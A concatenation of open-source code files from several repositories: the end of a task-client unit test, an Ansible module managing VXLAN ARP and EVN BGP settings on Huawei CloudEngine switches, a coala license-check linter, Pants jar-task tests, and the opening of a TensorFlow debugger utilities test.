**get_client_config
)
self.get_client_patcher.start()
self.client = client.TaskClient()
def tearDown(self):
super(WhenUsingAsyncTaskClient, self).tearDown()
self.get_client_patcher.stop()
def test_should_process_type_order(self):
self.client.process_type_order(order_id=self.order_id,
project_id=self.external_project_id,
request_id=self.request_id)
self.mock_client.cast.assert_called_with(
{}, 'process_type_order', order_id=self.order_id,
project_id=self.external_project_id,
request_id=self.request_id)
class WhenCreatingDirectTaskClient(utils.BaseTestCase):
"""Test using the synchronous task client (i.e. standalone mode)."""
def setUp(self):
super(WhenCreatingDirectTaskClient, self).setUp()
queue.get_client = mock.MagicMock(return_value=None)
self.client = client.TaskClient()
def test_should_use_direct_task_client(self):
self.assertIsInstance(self.client._client,
client._DirectTaskInvokerClient)
| apache-2.0 |
switchboardOp/ansible | lib/ansible/modules/network/cloudengine/ce_vxlan_arp.py | 46 | 24139 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'}
DOCUMENTATION = """
---
module: ce_vxlan_arp
version_added: "2.4"
short_description: Manages ARP attributes of VXLAN on HUAWEI CloudEngine devices.
description:
- Manages ARP attributes of VXLAN on HUAWEI CloudEngine devices.
author: QijunPan (@CloudEngine-Ansible)
options:
evn_bgp:
description:
- Enables EVN BGP.
required: false
choices: ['enable', 'disable']
default: null
evn_source_ip:
description:
- Specifies the source address of an EVN BGP peer.
The value is in dotted decimal notation.
required: false
default: null
evn_peer_ip:
description:
- Specifies the IP address of an EVN BGP peer.
The value is in dotted decimal notation.
required: false
default: null
evn_server:
description:
- Configures the local device as the router reflector (RR) on the EVN network.
required: false
choices: ['enable', 'disable']
default: null
evn_reflect_client:
description:
- Configures the local device as the route reflector (RR) and its peer as the client.
required: false
choices: ['enable', 'disable']
default: null
vbdif_name:
description:
- Full name of VBDIF interface, i.e. Vbdif100.
required: false
default: null
arp_collect_host:
description:
- Enables EVN BGP or BGP EVPN to collect host information.
required: false
choices: ['enable', 'disable']
default: null
host_collect_protocol:
description:
- Enables EVN BGP or BGP EVPN to advertise host information.
required: false
choices: ['bgp','none']
default: null
bridge_domain_id:
description:
- Specifies a BD(bridge domain) ID.
The value is an integer ranging from 1 to 16777215.
required: false
default: null
arp_suppress:
description:
- Enables ARP broadcast suppression in a BD.
required: false
choices: ['enable', 'disable']
default: null
state:
description:
- Determines whether the config should be present or not
on the device.
required: false
default: present
choices: ['present', 'absent']
"""
EXAMPLES = '''
- name: vxlan arp module test
hosts: ce128
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: Configure EVN BGP on Layer 2 and Layer 3 VXLAN gateways to establish EVN BGP peer relationships.
ce_vxlan_arp:
evn_bgp: enable
evn_source_ip: 6.6.6.6
evn_peer_ip: 7.7.7.7
provider: "{{ cli }}"
- name: Configure a Layer 3 VXLAN gateway as a BGP RR.
ce_vxlan_arp:
evn_bgp: enable
evn_server: enable
provider: "{{ cli }}"
- name: Enable EVN BGP on a Layer 3 VXLAN gateway to collect host information.
ce_vxlan_arp:
vbdif_name: Vbdif100
arp_collect_host: enable
provider: "{{ cli }}"
- name: Enable Layer 2 and Layer 3 VXLAN gateways to use EVN BGP to advertise host information.
ce_vxlan_arp:
host_collect_protocol: bgp
provider: "{{ cli }}"
- name: Enable ARP broadcast suppression on a Layer 2 VXLAN gateway.
ce_vxlan_arp:
bridge_domain_id: 100
arp_suppress: enable
provider: "{{ cli }}"
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: verbose mode
type: dict
sample: {"evn_bgp": "enable", "evn_source_ip": "6.6.6.6", "evn_peer_ip":"7.7.7.7", state: "present"}
existing:
description: k/v pairs of existing configuration
returned: verbose mode
type: dict
sample: {"evn_bgp": "disable", "evn_source_ip": null, "evn_peer_ip": []}
end_state:
description: k/v pairs of configuration after module execution
returned: verbose mode
type: dict
sample: {"evn_bgp": "enable", "evn_source_ip": "6.6.6.6", "evn_peer_ip": ["7.7.7.7"]}
updates:
description: commands sent to the device
returned: always
type: list
sample: ["evn bgp",
"source-address 6.6.6.6",
"peer 7.7.7.7"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
import re
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_config, load_config
from ansible.module_utils.ce import ce_argument_spec
def is_config_exist(cmp_cfg, test_cfg):
"""is configuration exist"""
if not cmp_cfg or not test_cfg:
return False
return bool(test_cfg in cmp_cfg)
def is_valid_v4addr(addr):
"""check is ipv4 addr is valid"""
if addr.count('.') == 3:
addr_list = addr.split('.')
if len(addr_list) != 4:
return False
for each_num in addr_list:
if not each_num.isdigit():
return False
if int(each_num) > 255:
return False
return True
return False
def get_evn_peers(config):
"""get evn peer ip list"""
get = re.findall(r"peer ([0-9]+.[0-9]+.[0-9]+.[0-9]+)", config)
if not get:
return None
else:
return list(set(get))
def get_evn_srouce(config):
"""get evn peer ip list"""
get = re.findall(
r"source-address ([0-9]+.[0-9]+.[0-9]+.[0-9]+)", config)
if not get:
return None
else:
return get[0]
def get_evn_reflect_client(config):
"""get evn reflect client list"""
get = re.findall(
r"peer ([0-9]+.[0-9]+.[0-9]+.[0-9]+)\s*reflect-client", config)
if not get:
return None
else:
return list(get)
class VxlanArp(object):
"""
Manages arp attributes of VXLAN.
"""
def __init__(self, argument_spec):
self.spec = argument_spec
self.module = None
self.init_module()
# module input info
self.evn_bgp = self.module.params['evn_bgp']
self.evn_source_ip = self.module.params['evn_source_ip']
self.evn_peer_ip = self.module.params['evn_peer_ip']
self.evn_server = self.module.params['evn_server']
self.evn_reflect_client = self.module.params['evn_reflect_client']
self.vbdif_name = self.module.params['vbdif_name']
self.arp_collect_host = self.module.params['arp_collect_host']
self.host_collect_protocol = self.module.params[
'host_collect_protocol']
self.bridge_domain_id = self.module.params['bridge_domain_id']
self.arp_suppress = self.module.params['arp_suppress']
self.state = self.module.params['state']
# host info
self.host = self.module.params['host']
self.username = self.module.params['username']
self.port = self.module.params['port']
# state
self.config = "" # current config
self.changed = False
self.updates_cmd = list()
self.commands = list()
self.results = dict()
self.proposed = dict()
self.existing = dict()
self.end_state = dict()
def init_module(self):
"""init module"""
required_together = [("vbdif_name", "arp_collect_host"), ("bridge_domain_id", "arp_suppress")]
self.module = AnsibleModule(argument_spec=self.spec,
required_together=required_together,
supports_check_mode=True)
def cli_load_config(self, commands):
"""load config by cli"""
if not self.module.check_mode:
load_config(self.module, commands)
def get_current_config(self):
"""get current configuration"""
flags = list()
exp = "| ignore-case section include evn bgp|host collect protocol bgp"
if self.vbdif_name:
exp += "|^interface %s$" % self.vbdif_name
if self.bridge_domain_id:
exp += "|^bridge-domain %s$" % self.bridge_domain_id
flags.append(exp)
config = get_config(self.module, flags)
return config
def cli_add_command(self, command, undo=False):
"""add command to self.update_cmd and self.commands"""
if undo and command.lower() not in ["quit", "return"]:
cmd = "undo " + command
else:
cmd = command
self.commands.append(cmd) # set to device
if command.lower() not in ["quit", "return"]:
self.updates_cmd.append(cmd) # show updates result
def config_bridge_domain(self):
"""manage bridge domain configuration"""
if not self.bridge_domain_id:
return
# bridge-domain bd-id
# [undo] arp broadcast-suppress enable
cmd = "bridge-domain %s" % self.bridge_domain_id
if not is_config_exist(self.config, cmd):
self.module.fail_json(msg="Error: Bridge domain %s is not exist." % self.bridge_domain_id)
cmd = "arp broadcast-suppress enable"
exist = is_config_exist(self.config, cmd)
if self.arp_suppress == "enable" and not exist:
self.cli_add_command("bridge-domain %s" % self.bridge_domain_id)
self.cli_add_command(cmd)
self.cli_add_command("quit")
elif self.arp_suppress == "disable" and exist:
self.cli_add_command("bridge-domain %s" % self.bridge_domain_id)
self.cli_add_command(cmd, undo=True)
self.cli_add_command("quit")
def config_evn_bgp(self):
"""enables EVN BGP and configure evn bgp command"""
evn_bgp_view = False
evn_bgp_enable = False
cmd = "evn bgp"
exist = is_config_exist(self.config, cmd)
if self.evn_bgp == "enable" or exist:
evn_bgp_enable = True
# [undo] evn bgp
if self.evn_bgp:
if self.evn_bgp == "enable" and not exist:
self.cli_add_command(cmd)
evn_bgp_view = True
elif self.evn_bgp == "disable" and exist:
self.cli_add_command(cmd, undo=True)
return
# [undo] source-address ip-address
if evn_bgp_enable and self.evn_source_ip:
cmd = "source-address %s" % self.evn_source_ip
exist = is_config_exist(self.config, cmd)
if self.state == "present" and not exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd)
elif self.state == "absent" and exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd, undo=True)
# [undo] peer ip-address
# [undo] peer ipv4-address reflect-client
if evn_bgp_enable and self.evn_peer_ip:
cmd = "peer %s" % self.evn_peer_ip
exist = is_config_exist(self.config, cmd)
if self.state == "present":
if not exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd)
if self.evn_reflect_client == "enable":
self.cli_add_command(
"peer %s reflect-client" % self.evn_peer_ip)
else:
if self.evn_reflect_client:
cmd = "peer %s reflect-client" % self.evn_peer_ip
exist = is_config_exist(self.config, cmd)
if self.evn_reflect_client == "enable" and not exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd)
elif self.evn_reflect_client == "disable" and exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd, undo=True)
else:
if exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd, undo=True)
# [undo] server enable
if evn_bgp_enable and self.evn_server:
cmd = "server enable"
exist = is_config_exist(self.config, cmd)
if self.evn_server == "enable" and not exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd)
elif self.evn_server == "disable" and exist:
if not evn_bgp_view:
self.cli_add_command("evn bgp")
evn_bgp_view = True
self.cli_add_command(cmd, undo=True)
if evn_bgp_view:
self.cli_add_command("quit")
def config_vbdif(self):
"""configure command at the VBDIF interface view"""
# interface vbdif bd-id
# [undo] arp collect host enable
cmd = "interface %s" % self.vbdif_name.lower().capitalize()
exist = is_config_exist(self.config, cmd)
if not exist:
self.module.fail_json(
msg="Error: Interface %s does not exist." % self.vbdif_name)
cmd = "arp collect host enable"
exist = is_config_exist(self.config, cmd)
if self.arp_collect_host == "enable" and not exist:
self.cli_add_command("interface %s" %
self.vbdif_name.lower().capitalize())
self.cli_add_command(cmd)
self.cli_add_command("quit")
elif self.arp_collect_host == "disable" and exist:
self.cli_add_command("interface %s" %
self.vbdif_name.lower().capitalize())
self.cli_add_command(cmd, undo=True)
self.cli_add_command("quit")
def config_host_collect_protocal(self):
"""Enable EVN BGP or BGP EVPN to advertise host information"""
# [undo] host collect protocol bgp
cmd = "host collect protocol bgp"
exist = is_config_exist(self.config, cmd)
if self.state == "present":
if self.host_collect_protocol == "bgp" and not exist:
self.cli_add_command(cmd)
elif self.host_collect_protocol == "none" and exist:
self.cli_add_command(cmd, undo=True)
else:
if self.host_collect_protocol == "bgp" and exist:
self.cli_add_command(cmd, undo=True)
def is_valid_vbdif(self, ifname):
"""check is interface vbdif is valid"""
if not ifname.upper().startswith('VBDIF'):
return False
bdid = self.vbdif_name.replace(" ", "").upper().replace("VBDIF", "")
if not bdid.isdigit():
return False
if int(bdid) < 1 or int(bdid) > 16777215:
return False
return True
def check_params(self):
"""Check all input params"""
# bridge domain id check
if self.bridge_domain_id:
if not self.bridge_domain_id.isdigit():
self.module.fail_json(
msg="Error: Bridge domain id is not digit.")
if int(self.bridge_domain_id) < 1 or int(self.bridge_domain_id) > 16777215:
self.module.fail_json(
msg="Error: Bridge domain id is not in the range from 1 to 16777215.")
# evn_source_ip check
if self.evn_source_ip:
if not is_valid_v4addr(self.evn_source_ip):
self.module.fail_json(msg="Error: evn_source_ip is invalid.")
# evn_peer_ip check
if self.evn_peer_ip:
if not is_valid_v4addr(self.evn_peer_ip):
self.module.fail_json(msg="Error: evn_peer_ip is invalid.")
# vbdif_name check
if self.vbdif_name:
self.vbdif_name = self.vbdif_name.replace(
" ", "").lower().capitalize()
if not self.is_valid_vbdif(self.vbdif_name):
self.module.fail_json(msg="Error: vbdif_name is invalid.")
# evn_reflect_client and evn_peer_ip must set at the same time
if self.evn_reflect_client and not self.evn_peer_ip:
self.module.fail_json(
msg="Error: evn_reflect_client and evn_peer_ip must set at the same time.")
# evn_server and evn_reflect_client can not set at the same time
if self.evn_server == "enable" and self.evn_reflect_client == "enable":
self.module.fail_json(
msg="Error: evn_server and evn_reflect_client can not set at the same time.")
def get_proposed(self):
"""get proposed info"""
if self.evn_bgp:
self.proposed["evn_bgp"] = self.evn_bgp
if self.evn_source_ip:
self.proposed["evn_source_ip"] = self.evn_source_ip
if self.evn_peer_ip:
self.proposed["evn_peer_ip"] = self.evn_peer_ip
if self.evn_server:
self.proposed["evn_server"] = self.evn_server
if self.evn_reflect_client:
self.proposed["evn_reflect_client"] = self.evn_reflect_client
if self.arp_collect_host:
self.proposed["arp_collect_host"] = self.arp_collect_host
if self.host_collect_protocol:
self.proposed["host_collect_protocol"] = self.host_collect_protocol
if self.arp_suppress:
self.proposed["arp_suppress"] = self.arp_suppress
if self.vbdif_name:
self.proposed["vbdif_name"] = self.evn_peer_ip
if self.bridge_domain_id:
self.proposed["bridge_domain_id"] = self.bridge_domain_id
self.proposed["state"] = self.state
def get_existing(self):
"""get existing info"""
evn_bgp_exist = is_config_exist(self.config, "evn bgp")
if evn_bgp_exist:
self.existing["evn_bgp"] = "enable"
else:
self.existing["evn_bgp"] = "disable"
if evn_bgp_exist:
if is_config_exist(self.config, "server enable"):
self.existing["evn_server"] = "enable"
else:
self.existing["evn_server"] = "disable"
self.existing["evn_source_ip"] = get_evn_srouce(self.config)
self.existing["evn_peer_ip"] = get_evn_peers(self.config)
self.existing["evn_reflect_client"] = get_evn_reflect_client(
self.config)
if is_config_exist(self.config, "arp collect host enable"):
self.existing["host_collect_protocol"] = "enable"
else:
self.existing["host_collect_protocol"] = "disable"
if is_config_exist(self.config, "host collect protocol bgp"):
self.existing["host_collect_protocol"] = "bgp"
else:
self.existing["host_collect_protocol"] = None
if is_config_exist(self.config, "arp broadcast-suppress enable"):
self.existing["arp_suppress"] = "enable"
else:
self.existing["arp_suppress"] = "disable"
def get_end_state(self):
"""get end state info"""
config = self.get_current_config()
evn_bgp_exist = is_config_exist(config, "evn bgp")
if evn_bgp_exist:
self.end_state["evn_bgp"] = "enable"
else:
self.end_state["evn_bgp"] = "disable"
if evn_bgp_exist:
if is_config_exist(config, "server enable"):
self.end_state["evn_server"] = "enable"
else:
self.end_state["evn_server"] = "disable"
self.end_state["evn_source_ip"] = get_evn_srouce(config)
self.end_state["evn_peer_ip"] = get_evn_peers(config)
self.end_state[
"evn_reflect_client"] = get_evn_reflect_client(config)
if is_config_exist(config, "arp collect host enable"):
self.end_state["host_collect_protocol"] = "enable"
else:
self.end_state["host_collect_protocol"] = "disable"
if is_config_exist(config, "host collect protocol bgp"):
self.end_state["host_collect_protocol"] = "bgp"
else:
self.end_state["host_collect_protocol"] = None
if is_config_exist(config, "arp broadcast-suppress enable"):
self.end_state["arp_suppress"] = "enable"
else:
self.end_state["arp_suppress"] = "disable"
def work(self):
"""worker"""
self.check_params()
self.config = self.get_current_config()
self.get_existing()
self.get_proposed()
# deal present or absent
if self.evn_bgp or self.evn_server or self.evn_peer_ip or self.evn_source_ip:
self.config_evn_bgp()
if self.vbdif_name and self.arp_collect_host:
self.config_vbdif()
if self.host_collect_protocol:
self.config_host_collect_protocal()
if self.bridge_domain_id and self.arp_suppress:
self.config_bridge_domain()
if self.commands:
self.cli_load_config(self.commands)
self.changed = True
self.get_end_state()
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
if self.changed:
self.results['updates'] = self.updates_cmd
else:
self.results['updates'] = list()
self.module.exit_json(**self.results)
def main():
"""Module main"""
argument_spec = dict(
evn_bgp=dict(required=False, type='str',
choices=['enable', 'disable']),
evn_source_ip=dict(required=False, type='str'),
evn_peer_ip=dict(required=False, type='str'),
evn_server=dict(required=False, type='str',
choices=['enable', 'disable']),
evn_reflect_client=dict(
required=False, type='str', choices=['enable', 'disable']),
vbdif_name=dict(required=False, type='str'),
arp_collect_host=dict(required=False, type='str',
choices=['enable', 'disable']),
host_collect_protocol=dict(
required=False, type='str', choices=['bgp', 'none']),
bridge_domain_id=dict(required=False, type='str'),
arp_suppress=dict(required=False, type='str',
choices=['enable', 'disable']),
state=dict(required=False, default='present',
choices=['present', 'absent'])
)
argument_spec.update(ce_argument_spec)
module = VxlanArp(argument_spec)
module.work()
if __name__ == '__main__':
main()
| gpl-3.0 |
aptrishu/coala-bears | bears/general/LicenseCheckBear.py | 13 | 1675 | from coalib.bearlib.abstractions.Linter import linter
from dependency_management.requirements.DistributionRequirement import (
DistributionRequirement)
@linter(executable='licensecheck',
output_format='regex',
output_regex=r'.*: .*UNKNOWN$',
result_message='No license found.')
class LicenseCheckBear:
"""
Attempts to check the given file for a license, by searching the start
of the file for text belonging to various licenses.
For Ubuntu/Debian users, the ``licensecheck_lines`` option has to be used
in accordance with the ``licensecheck_tail`` option.
"""
LANGUAGES = {'All'}
REQUIREMENTS = {
DistributionRequirement(
apt_get='devscripts',
dnf='licensecheck',
portage=None,
zypper='devscripts',
),
}
AUTHORS = {'The coala developers'}
AUTHORS_EMAILS = {'[email protected]'}
LICENSE = 'AGPL-3.0'
CAN_DETECT = {'License'}
@staticmethod
def create_arguments(filename, file, config_file,
licensecheck_lines: int=60,
licensecheck_tail: int=5000):
"""
:param licensecheck_lines:
Specify how many lines of the file header should be parsed for
license information. Set to 0 to parse the whole file (and ignore
``licensecheck_tail``).
:param licensecheck_tail:
Specify how many bytes to parse at end of file. Set to 0 to disable
parsing from end of file.
"""
return ('--lines', str(licensecheck_lines), '--tail',
str(licensecheck_tail), filename)
| agpl-3.0 |
di0spyr0s/pants | tests/python/pants_test/tasks/test_jar_task.py | 6 | 11198 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
import re
from collections import defaultdict
from contextlib import contextmanager
from textwrap import dedent
from six.moves import range
from twitter.common.collections import maybe_list
from pants.backend.jvm.targets.java_agent import JavaAgent
from pants.backend.jvm.targets.jvm_binary import JvmBinary
from pants.backend.jvm.tasks.jar_task import JarTask
from pants.base.build_file_aliases import BuildFileAliases
from pants.goal.products import MultipleRootedProducts
from pants.util.contextutil import open_zip, temporary_dir, temporary_file
from pants.util.dirutil import safe_mkdir, safe_mkdtemp, safe_rmtree
from pants_test.jvm.jar_task_test_base import JarTaskTestBase
class BaseJarTaskTest(JarTaskTestBase):
class TestJarTask(JarTask):
def execute(self):
pass
@classmethod
def task_type(cls):
return cls.TestJarTask
@property
def alias_groups(self):
return super(BaseJarTaskTest, self).alias_groups.merge(BuildFileAliases.create(
targets={
'java_agent': JavaAgent,
'jvm_binary': JvmBinary,
},
))
def setUp(self):
super(BaseJarTaskTest, self).setUp()
self.workdir = safe_mkdtemp()
self.jar_task = self.prepare_execute(self.context())
def tearDown(self):
super(BaseJarTaskTest, self).tearDown()
if self.workdir:
safe_rmtree(self.workdir)
@contextmanager
def jarfile(self):
with temporary_file() as fd:
fd.close()
yield fd.name
def prepare_jar_task(self, context):
return self.prepare_execute(context)
def assert_listing(self, jar, *expected_items):
self.assertEquals(set(['META-INF/', 'META-INF/MANIFEST.MF']) | set(expected_items),
set(jar.namelist()))
class JarTaskTest(BaseJarTaskTest):
MAX_SUBPROC_ARGS = 50
def setUp(self):
super(JarTaskTest, self).setUp()
self.set_options(max_subprocess_args=self.MAX_SUBPROC_ARGS)
self.jar_task = self.prepare_jar_task(self.context())
def test_update_write(self):
with temporary_dir() as chroot:
_path = os.path.join(chroot, 'a/b/c')
safe_mkdir(_path)
data_file = os.path.join(_path, 'd.txt')
with open(data_file, 'w') as fd:
fd.write('e')
with self.jarfile() as existing_jarfile:
with self.jar_task.open_jar(existing_jarfile) as jar:
jar.write(data_file, 'f/g/h')
with open_zip(existing_jarfile) as jar:
self.assert_listing(jar, 'f/', 'f/g/', 'f/g/h')
self.assertEquals('e', jar.read('f/g/h'))
def test_update_writestr(self):
def assert_writestr(path, contents, *entries):
with self.jarfile() as existing_jarfile:
with self.jar_task.open_jar(existing_jarfile) as jar:
jar.writestr(path, contents)
with open_zip(existing_jarfile) as jar:
self.assert_listing(jar, *entries)
self.assertEquals(contents, jar.read(path))
assert_writestr('a.txt', b'b', 'a.txt')
assert_writestr('a/b/c.txt', b'd', 'a/', 'a/b/', 'a/b/c.txt')
def test_overwrite_write(self):
with temporary_dir() as chroot:
_path = os.path.join(chroot, 'a/b/c')
safe_mkdir(_path)
data_file = os.path.join(_path, 'd.txt')
with open(data_file, 'w') as fd:
fd.write('e')
with self.jarfile() as existing_jarfile:
with self.jar_task.open_jar(existing_jarfile, overwrite=True) as jar:
jar.write(data_file, 'f/g/h')
with open_zip(existing_jarfile) as jar:
self.assert_listing(jar, 'f/', 'f/g/', 'f/g/h')
self.assertEquals('e', jar.read('f/g/h'))
def test_overwrite_writestr(self):
with self.jarfile() as existing_jarfile:
with self.jar_task.open_jar(existing_jarfile, overwrite=True) as jar:
jar.writestr('README', b'42')
with open_zip(existing_jarfile) as jar:
self.assert_listing(jar, 'README')
self.assertEquals('42', jar.read('README'))
def test_custom_manifest(self):
contents = b'Manifest-Version: 1.0\r\nCreated-By: test\r\n\r\n'
with self.jarfile() as existing_jarfile:
with self.jar_task.open_jar(existing_jarfile, overwrite=True) as jar:
jar.writestr('README', b'42')
with open_zip(existing_jarfile) as jar:
self.assert_listing(jar, 'README')
self.assertEquals('42', jar.read('README'))
self.assertNotEqual(contents, jar.read('META-INF/MANIFEST.MF'))
with self.jar_task.open_jar(existing_jarfile, overwrite=False) as jar:
jar.writestr('META-INF/MANIFEST.MF', contents)
with open_zip(existing_jarfile) as jar:
self.assert_listing(jar, 'README')
self.assertEquals('42', jar.read('README'))
self.assertEquals(contents, jar.read('META-INF/MANIFEST.MF'))
def test_classpath(self):
def manifest_content(classpath):
return (b'Manifest-Version: 1.0\r\n' +
b'Class-Path: {}\r\n' +
b'Created-By: org.pantsbuild.tools.jar.JarBuilder\r\n\r\n').format(
' '.join(maybe_list(classpath)))
def assert_classpath(classpath):
with self.jarfile() as existing_jarfile:
# Note for -classpath, there is no update, it's already overwriting.
# To verify this, first add a random classpath, and verify it's overwritten by
# the supplied classpath value.
with self.jar_task.open_jar(existing_jarfile) as jar:
jar.classpath('something_should_be_overwritten.jar')
with self.jar_task.open_jar(existing_jarfile) as jar:
jar.classpath(classpath)
with open_zip(existing_jarfile) as jar:
self.assertEqual(manifest_content(classpath), jar.read('META-INF/MANIFEST.MF'))
assert_classpath('a.jar')
assert_classpath(['a.jar', 'b.jar'])
def test_update_jars(self):
with self.jarfile() as main_jar:
with self.jarfile() as included_jar:
with self.jar_task.open_jar(main_jar) as jar:
jar.writestr('a/b', b'c')
with self.jar_task.open_jar(included_jar) as jar:
jar.writestr('e/f', b'g')
with self.jar_task.open_jar(main_jar) as jar:
jar.writejar(included_jar)
with open_zip(main_jar) as jar:
self.assert_listing(jar, 'a/', 'a/b', 'e/', 'e/f')
def test_overwrite_jars(self):
with self.jarfile() as main_jar:
with self.jarfile() as included_jar:
with self.jar_task.open_jar(main_jar) as jar:
jar.writestr('a/b', b'c')
with self.jar_task.open_jar(included_jar) as jar:
jar.writestr('e/f', b'g')
# Create lots of included jars (even though they're all the same)
# so the -jars argument to jar-tool will exceed max_args limit thus
# switch to @argfile calling style.
with self.jar_task.open_jar(main_jar, overwrite=True) as jar:
for i in range(self.MAX_SUBPROC_ARGS + 1):
jar.writejar(included_jar)
with open_zip(main_jar) as jar:
self.assert_listing(jar, 'e/', 'e/f')
class JarBuilderTest(BaseJarTaskTest):
def setUp(self):
super(JarBuilderTest, self).setUp()
self.set_options(max_subprocess_args=100)
def _add_to_classes_by_target(self, context, tgt, filename):
class_products = context.products.get_data('classes_by_target',
lambda: defaultdict(MultipleRootedProducts))
java_agent_products = MultipleRootedProducts()
java_agent_products.add_rel_paths(os.path.join(self.build_root,
os.path.dirname(filename)),
[os.path.basename(filename)])
class_products[tgt] = java_agent_products
def test_agent_manifest(self):
self.add_to_build_file('src/java/pants/agents', dedent("""
java_agent(
name='fake_agent',
premain='bob',
agent_class='fred',
can_redefine=True,
can_retransform=True,
can_set_native_method_prefix=True
)""").strip())
java_agent = self.target('src/java/pants/agents:fake_agent')
context = self.context(target_roots=[java_agent])
jar_task = self.prepare_jar_task(context)
classfile = '.pants.d/javac/classes/FakeAgent.class'
self.create_file(classfile, '0xCAFEBABE')
self._add_to_classes_by_target(context, java_agent, classfile)
context.products.safe_create_data('resources_by_target',
lambda: defaultdict(MultipleRootedProducts))
with self.jarfile() as existing_jarfile:
with jar_task.open_jar(existing_jarfile) as jar:
with jar_task.create_jar_builder(jar) as jar_builder:
jar_builder.add_target(java_agent)
with open_zip(existing_jarfile) as jar:
self.assert_listing(jar, 'FakeAgent.class')
self.assertEqual('0xCAFEBABE', jar.read('FakeAgent.class'))
manifest = jar.read('META-INF/MANIFEST.MF').strip()
all_entries = dict(tuple(re.split(r'\s*:\s*', line, 1)) for line in manifest.splitlines())
expected_entries = {
'Agent-Class': 'fred',
'Premain-Class': 'bob',
'Can-Redefine-Classes': 'true',
'Can-Retransform-Classes': 'true',
'Can-Set-Native-Method-Prefix': 'true',
}
self.assertEquals(set(expected_entries.items()),
set(expected_entries.items()).intersection(set(all_entries.items())))
def test_manifest_items(self):
self.add_to_build_file('src/java/hello', dedent("""
jvm_binary(
name='hello',
main='hello.Hello',
manifest_entries = {
'Foo': 'foo-value',
'Implementation-Version': '1.2.3',
},
)""").strip())
binary_target = self.target('src/java/hello:hello')
context = self.context(target_roots=[binary_target])
classfile = '.pants.d/javac/classes/hello/Hello.class'
self.create_file(classfile, '0xDEADBEEF')
self._add_to_classes_by_target(context, binary_target, classfile)
context.products.safe_create_data('resources_by_target',
lambda: defaultdict(MultipleRootedProducts))
jar_task = self.prepare_jar_task(context)
with self.jarfile() as existing_jarfile:
with jar_task.open_jar(existing_jarfile) as jar:
with jar_task.create_jar_builder(jar) as jar_builder:
jar_builder.add_target(binary_target)
with open_zip(existing_jarfile) as jar:
manifest = jar.read('META-INF/MANIFEST.MF').strip()
all_entries = dict(tuple(re.split(r'\s*:\s*', line, 1)) for line in manifest.splitlines())
expected_entries = {
'Foo': 'foo-value',
'Implementation-Version': '1.2.3',
}
self.assertEquals(set(expected_entries.items()),
set(expected_entries.items()).intersection(set(all_entries.items())))
| apache-2.0 |
Intel-tensorflow/tensorflow | tensorflow/python/debug/lib/debug_utils_test.py | 14 | 13535 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for TensorFlow Debugger (tfdbg) Utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import test_util
from tensorflow.python.ops import math_ops
# Import resource_variable_ops for the variables-to-tensor implicit conversion.
from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
@test_util.run_v1_only("Requires tf.Session")
class DebugUtilsTest(test_util.TensorFlowTestCase):
@classmethod
def setUpClass(cls):
cls._sess = session.Session()
with cls._sess:
cls._a_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
cls._b_init_val = np.array([[2.0], [-1.0]])
cls._c_val = np.array([[-4.0], [np.nan]])
cls._a_init = constant_op.constant(
cls._a_init_val, shape=[2, 2], name="a1_init")
cls._b_init = constant_op.constant(
cls._b_init_val, shape=[2, 1], name="b_init")
cls._a = variables.VariableV1(cls._a_init, name="a1")
cls._b = variables.VariableV1(cls._b_init, name="b")
cls._c = constant_op.constant(cls._c_val, shape=[2, 1], name="c")
# Matrix product of a and b.
cls._p = math_ops.matmul(cls._a, cls._b, name="p1")
# Sum of two vectors.
cls._s = math_ops.add(cls._p, cls._c, name="s")
cls._graph = cls._sess.graph
# These are all the expected nodes in the graph:
# - Two variables (a, b), each with four nodes (Variable, init, Assign,
# read).
# - One constant (c).
# - One add operation and one matmul operation.
# - One wildcard node name ("*") that covers nodes created internally
# by TensorFlow itself (e.g., Grappler).
